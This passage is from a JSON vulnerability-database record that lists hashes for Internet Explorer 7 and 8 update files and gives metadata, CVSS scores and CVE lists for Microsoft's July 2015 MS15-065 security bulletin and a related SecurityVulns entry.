class=\"sbody-td\">99F3B00FF2A5F999997013C6185427B30F2B8D0A88D0786AA83EBFE2CE899CF5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-x64-FRA.exe</td><td class=\"sbody-td\">FEF451918471C4D413E7C5227070DE6C26A37909</td><td class=\"sbody-td\">B8C4DC8C1115194D0044933E90FF4E81DC3E6BFEEF08BF1901DE2E20808D1264</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-x64-ITA.exe</td><td class=\"sbody-td\">B5A71E74F9FDDCBBD3F931855330AB1C228FC22F</td><td class=\"sbody-td\">BC6FE88DD1466E183A7813251A3313EAD21E1D5215E620171277A34C6A42A4C0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-x64-JPN.exe</td><td class=\"sbody-td\">C6622EFB49FCD3B3745F9FC4D42FBFABF4407EDF</td><td class=\"sbody-td\">FA34D34B98BC75ACF9968191812B5C1B6BAEA2573D24DAB87469E3FCB5C138B1</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-x64-KOR.exe</td><td class=\"sbody-td\">4CCD0FE93A65F0E10C7D8AC15A0B4ABC00F91678</td><td class=\"sbody-td\">7578588903076F0352CF9C62C53FF5680C54CCB711E9F4BB8863220A7B6FF3D3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-x86-CHS.exe</td><td class=\"sbody-td\">D1C9153280BC190936A58834ECC290DB3652D76D</td><td class=\"sbody-td\">11A59CCE2FC3D3346B99131EBE275B6F0675C73C12EE5406687C8B2CFF03B9C5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-x86-CHT.exe</td><td class=\"sbody-td\">839E76E43BEB9DC3692E821DBEC2BDFE73CC1FA4</td><td class=\"sbody-td\">8D5B41ED13ABB5DBAFFFA5E5C5D46251D2129AB918853E21176880808E724D1E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-x86-CSY.exe</td><td class=\"sbody-td\">264D068928FF2D2BE764266BAA8FD06524521BE2</td><td class=\"sbody-td\">3864D5282793D66E1492226D435BAA880596AB00451919CA9583123505DC9B2A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-x86-DEU.exe</td><td class=\"sbody-td\">8E30E6D02654DA69178E5B7A40DE81A49CB8A29D</td><td class=\"sbody-td\">4E8DDE21C2200C2F9FC2CF3CCA5475A22623D7678E77F91190B7C502313CD47B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-x86-ENU.exe</td><td class=\"sbody-td\">905091BB41D6962578DAB9DC4E7FB1F74A302743</td><td class=\"sbody-td\">A9F17BA2682329FD3F478A8459ED63FAB80EA7450C4D083B4693947F4A07ED31</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-x86-ESN.exe</td><td class=\"sbody-td\">FE0C115A8862FE585E626E9A9D6B6373D9177F98</td><td class=\"sbody-td\">9A33377B87F0786E206A9C93A11F8BE7D94D3F716125FD1EE3673F2F1636AD8B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-x86-FRA.exe</td><td class=\"sbody-td\">CA0DDF05D37EA3E8D60A186B962DE74E7BDE776A</td><td 
class=\"sbody-td\">84E2EE79597B6EEA634668D35E551AA7856474E91CD5209934ECF74A5254D2A8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-x86-HUN.exe</td><td class=\"sbody-td\">17D7A4D4559DCF9594734E0643C4FA60982206EF</td><td class=\"sbody-td\">8A1043C25BECA6AB1B9874B1CA26EF35737EDA5151495518926468F1A7E41579</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-x86-ITA.exe</td><td class=\"sbody-td\">E04ED663A89FC2E9BFA73DA8128DDE10E71A3647</td><td class=\"sbody-td\">CEB6F02E5E9D32E88251833E06427F0631C6D074412F7C92048718A5DA26B6AB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-x86-JPN.exe</td><td class=\"sbody-td\">B7DA9943EEEF7D9FC482300762C2A5D0F77E76C3</td><td class=\"sbody-td\">B1A21AC3FF3FDC8FE48373D33F03C88AA779E57093E544DD345CB108C400B746</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-x86-KOR.exe</td><td class=\"sbody-td\">7CB5351C3BFDB8FA78648C69B11B0C59E55C732A</td><td class=\"sbody-td\">9E26241E23014609D4474FA6D1CCAC3B9A9CD8FEF602378DE73177DF62F56997</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-x86-NLD.exe</td><td class=\"sbody-td\">7DB411433BC1855546154C759FE91F19A982973F</td><td class=\"sbody-td\">0228420DDEE3555E465965767FEA86DD4F5A91F7381B2394A97DCA1E4886FC6C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE7-WindowsServer2003-KB3074886-x86-SVE.exe</td><td class=\"sbody-td\">380A0DAF3687615C8F2790771FC5D6A9509C4F85</td><td class=\"sbody-td\">33FD2B98E81D39503204C0A2D6831BEF550A1514913059F7D1375F57F471B1C3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-Windows6.0-KB3065822-x64.msu</td><td class=\"sbody-td\">D55EC336DE92A2042F7D54D534AEDB0CE11DC9DD</td><td class=\"sbody-td\">65AC3AAFB826E0A8CE9F8EBA8E5CC6DD26122E1DFED0D96686C1CBBC4DD489AC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-Windows6.0-KB3065822-x86.msu</td><td 
class=\"sbody-td\">925BFCE425E36E3AFE2AABE827BDD604540A548E</td><td class=\"sbody-td\">81135916F1705A02C07335D22F1BED204324E5EE779BDA09AFD05D11321F2B22</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-Windows6.0-KB3074886-x64.msu</td><td class=\"sbody-td\">2DB8883A27BE57F0CC8D53D3AB77119C48EE17E5</td><td class=\"sbody-td\">AE0BFCCC697B2A8378BB6046DB75CA90BAC2663990B4B10889E2007BC5568916</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-Windows6.0-KB3074886-x86.msu</td><td class=\"sbody-td\">8D344BE0870CBEF1A8E81274CE2AEC32232C49BB</td><td class=\"sbody-td\">B10E8D7A84D9273510D3FE5FB72154A93477444483413105C13F0809CE69D5EF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3065822-x64-CHS.exe</td><td class=\"sbody-td\">A64CCFBEBD79119530876B903D0C1963AA305CB9</td><td class=\"sbody-td\">AAB9266CF64CB7830EFC5AC1CD127332CDD059EC0FE5E8C3D7CB2332BB053A97</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3065822-x64-CHT.exe</td><td class=\"sbody-td\">E7F88DE3E25AD3E6BBA657521F01B8894795CA71</td><td class=\"sbody-td\">84B7F0FA3653634A334BCD672FD45132FC19655086467371B7EACDDA28B1BCE9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3065822-x64-DEU.exe</td><td class=\"sbody-td\">EDBEE28DE34E2A2F2784EDDFC6AFD4D054F2878A</td><td class=\"sbody-td\">D34FB546BB2EC4409BE8D3D66E2196EC1A24BF4B784F04A34ADBCEC366F5A5C4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3065822-x64-ENU.exe</td><td class=\"sbody-td\">9B3204D5DB8CAF6DB7EA710A69A9AB2958A0C2D3</td><td class=\"sbody-td\">1A0EDCA601383AE44DD558833A222A2B1BAB83E3730FDB4B7C3FA94B49125DA2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3065822-x64-ESN.exe</td><td class=\"sbody-td\">CDD74AC81E1C4BF02E971FD590F9811C463C3D9E</td><td class=\"sbody-td\">7D4005935560F2C9D9F2DEC572D1CF2E2073FE0C84812A28B645F9149B5AC0A1</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\">IE8-WindowsServer2003-KB3065822-x64-FRA.exe</td><td class=\"sbody-td\">5A47ABCD86D61E4858A43282D9317D1D48B30A9F</td><td class=\"sbody-td\">AA8707ABB300717A470B50E80D4EB54CD6333EF14792A509BCC8F608FF0C2E7C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3065822-x64-ITA.exe</td><td class=\"sbody-td\">18E5E5D14EF42F1E7C2456AA4F2A7613F7F63EF9</td><td class=\"sbody-td\">2786DD86BE41A9506D29F111975E122ECEA251640321F47A0DEEB5D465F818BB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3065822-x64-JPN.exe</td><td class=\"sbody-td\">E3649864A2085EB879497DA3EF0C164528789AF6</td><td class=\"sbody-td\">D9DCE006EC1C74682F888351939BB157891F62F21A703D1F884ED6DD4FD5B01B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3065822-x64-KOR.exe</td><td class=\"sbody-td\">DD3B06B5B2765D5B074672DE46D6C629071CD9E1</td><td class=\"sbody-td\">38F26B1174BB98FFE06B9135EF80D01818385A7E1B0756FA0ACF9B1A60503498</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3065822-x86-CHS.exe</td><td class=\"sbody-td\">2D5DB313102F4BBB6FD345AB829C0FD412347CBF</td><td class=\"sbody-td\">213209D1300974FD14620BE5DE3DF064E1FCE7BC70F919B7C2DA2726E50383F0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3065822-x86-CHT.exe</td><td class=\"sbody-td\">38FD5439A883C71D2FBC188FFFC2023D0375EDB6</td><td class=\"sbody-td\">AA7E1269BDF730213BFE415EB696E1BFD976A935BE8EF250BA5C042414E5258B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3065822-x86-CSY.exe</td><td class=\"sbody-td\">7104E8489748CDE15717C61F49C44723F6D68FC2</td><td class=\"sbody-td\">C23C31C5C40F2476ECEFF6DDD129A943C1A7E121D4862308FC8677162A52D7BD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3065822-x86-DEU.exe</td><td class=\"sbody-td\">214C93BC96C9E13B73024A78581B669087D1A65E</td><td 
class=\"sbody-td\">AB71DB50A03668C2883F15E89CDD8539B0EC9758DCA20BC357E90AC1E6F2D7C0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3065822-x86-ENU.exe</td><td class=\"sbody-td\">42918CA39E66F746DDB00077958D58F44A1295DB</td><td class=\"sbody-td\">AEF17118B2FB9A1F6A8F2E026B8555A082A1D2C4607A0E7BD2ABFAD8982DB199</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3065822-x86-ESN.exe</td><td class=\"sbody-td\">D316DA1D6FB89925A27B3C8B20E63D83B54AA5B7</td><td class=\"sbody-td\">5C92CA06F1BAAC513510B49FA0F0FEB6E42E1E7E9027D6A91B1F50F1D426BD2C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3065822-x86-FRA.exe</td><td class=\"sbody-td\">7F04E77CA3E06EC6B41A4A3D35E25D8EC2730A86</td><td class=\"sbody-td\">54D94BB2A153912C41B624D2E77A7448132695737D3B1594F593CCE6849929B3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3065822-x86-HUN.exe</td><td class=\"sbody-td\">858A728D50263BB0E2415F189E3BE7EC008B776D</td><td class=\"sbody-td\">C085719B0992B50E591F3D06CE25CD0003345CE1BFACBBC7ECCBB8A82C44C56C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3065822-x86-ITA.exe</td><td class=\"sbody-td\">180E0AAEE408F70D115D048FCE5FAD0313EA820E</td><td class=\"sbody-td\">3A52C9F94281A5B41C7C01DAEA70617C26C4147BC5006BB610856B3BDB18DB20</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3065822-x86-JPN.exe</td><td class=\"sbody-td\">2D6F9853D2CB3C945F79FEA0343A72EEF3592A07</td><td class=\"sbody-td\">798051F67B6C693DAC19DE85F9B8136673CC206A655E5DEC772B3F80A694B0C3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3065822-x86-KOR.exe</td><td class=\"sbody-td\">11C12CD67D3AD7FF8799D14FBE7F92AAA4C72301</td><td class=\"sbody-td\">0097C2A0E77836F3D07E66EAA495F272EB1682964E51D8C353A742E5B4FA2706</td></tr><tr class=\"sbody-tr\"><td 
class=\"sbody-td\">IE8-WindowsServer2003-KB3065822-x86-NLD.exe</td><td class=\"sbody-td\">D9FF4934A37E9EBF061495072228BC0F776B7DA7</td><td class=\"sbody-td\">E072DB2842B8329D32C246AF23CDDD34EC1E4313DE492B252BFBC168BAC752AA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3065822-x86-SVE.exe</td><td class=\"sbody-td\">6443171DAFBDA57F4E8DB83CF1172A41E9AEE1BE</td><td class=\"sbody-td\">61795E2A5BE07FBADDCF22D9066EE62298A2B6A550C76B606CFE50E543AFA505</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3074886-x64-CHS.exe</td><td class=\"sbody-td\">D14CDDD05F1BC0BBC4AE119163A49109170632C2</td><td class=\"sbody-td\">7414A44CCE0837B1660D3DD1B9AFF243F31E1EB8EA504F796849CFF750AAA950</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3074886-x64-CHT.exe</td><td class=\"sbody-td\">34802BA8115C2096E842AEA940E53CA0271CE284</td><td class=\"sbody-td\">CEF13569A5D96F70783615361D5AFC656B271D443CA6F4156D306CD0D334F51F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3074886-x64-DEU.exe</td><td class=\"sbody-td\">EF61E1F5BEF0EC2493CE72A777953242EAA7523E</td><td class=\"sbody-td\">21DF56948A3E400FD151979E7D7E2F4E34F98E2EF2379451F2F90423470FB571</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3074886-x64-ENU.exe</td><td class=\"sbody-td\">5FCCE26726EF29F5C82E212048D4E1073A996A37</td><td class=\"sbody-td\">87BC95462B216485FE85C9375C6776F0624830D35668FF73C9C6C91F1BCFBD5B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3074886-x64-ESN.exe</td><td class=\"sbody-td\">AFED8AC6B5ED7E25363FD7D5559D892A65C13D55</td><td class=\"sbody-td\">F971AA6CC76E95A03E573FE1EC1B5CC5C65D7CE72216EB1D59A38A3E917DD521</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">IE8-WindowsServer2003-KB3074886-x64-FRA.exe</td><td class=\"sbody-td\">618E4B822AD5A3DF2CB49BF97DB1ACDB1C9BB86A</td><td 
class=\"sbody-td\"></td></tr></table></div></div><br/></span></div></div></div></div></body></html>", "edition": 2, "cvss3": {}, "published": "2015-07-14T00:00:00", "type": "mskb", "title": "MS15-065: Security update for Internet Explorer: July 14, 2015", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1767", "CVE-2015-2401", "CVE-2015-2385", "CVE-2015-2422", "CVE-2015-1738", "CVE-2015-2391", "CVE-2015-2414", "CVE-2015-2383", "CVE-2015-2408", "CVE-2015-2413", "CVE-2015-1729", "CVE-2015-2404", "CVE-2015-2403", "CVE-2015-2410", "CVE-2015-2402", "CVE-2015-2419", "CVE-2015-2390", "CVE-2015-2397", "CVE-2015-2388", "CVE-2015-2398", "CVE-2015-2425", "CVE-2015-2411", "CVE-2015-1733", "CVE-2015-2412", "CVE-2015-2372", "CVE-2015-2384", "CVE-2015-2406", "CVE-2015-2421", "CVE-2015-2389"], "modified": "2015-11-09T07:45:32", "id": "KB3076321", "href": "https://support.microsoft.com/en-us/help/3076321/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2021-06-08T19:16:47", "description": "Internet Explorer and VBScript multiple security vulnerabilities, RDP code execution, Hyper-V code execution, multiple privilege escalations.", "edition": 2, "cvss3": {}, "published": "2015-07-19T00:00:00", "title": "Microsoft Windows multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-1767", "CVE-2015-2401", "CVE-2015-2385", "CVE-2015-2422", "CVE-2015-1738", "CVE-2015-2367", "CVE-2015-2391", "CVE-2015-2387", "CVE-2015-2362", "CVE-2015-2365", "CVE-2015-2414", "CVE-2015-2383", "CVE-2015-2373", "CVE-2015-2408", "CVE-2015-2413", "CVE-2015-2369", "CVE-2015-2366", "CVE-2015-1729", "CVE-2015-2417", "CVE-2015-2371", "CVE-2015-2404", "CVE-2015-2361", "CVE-2015-2403", "CVE-2015-2374", "CVE-2015-2410", "CVE-2015-2402", "CVE-2015-2419", "CVE-2015-2390", "CVE-2015-2397", "CVE-2015-2388", "CVE-2015-2398", "CVE-2015-2368", "CVE-2015-2425", "CVE-2015-2416", "CVE-2015-2364", "CVE-2015-2411", "CVE-2015-2363", "CVE-2015-1733", "CVE-2015-2370", "CVE-2015-2412", "CVE-2015-2372", "CVE-2015-2384", "CVE-2015-2381", "CVE-2015-2406", "CVE-2015-2421", 
"CVE-2015-2389"], "modified": "2015-07-19T00:00:00", "id": "SECURITYVULNS:VULN:14594", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14594", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}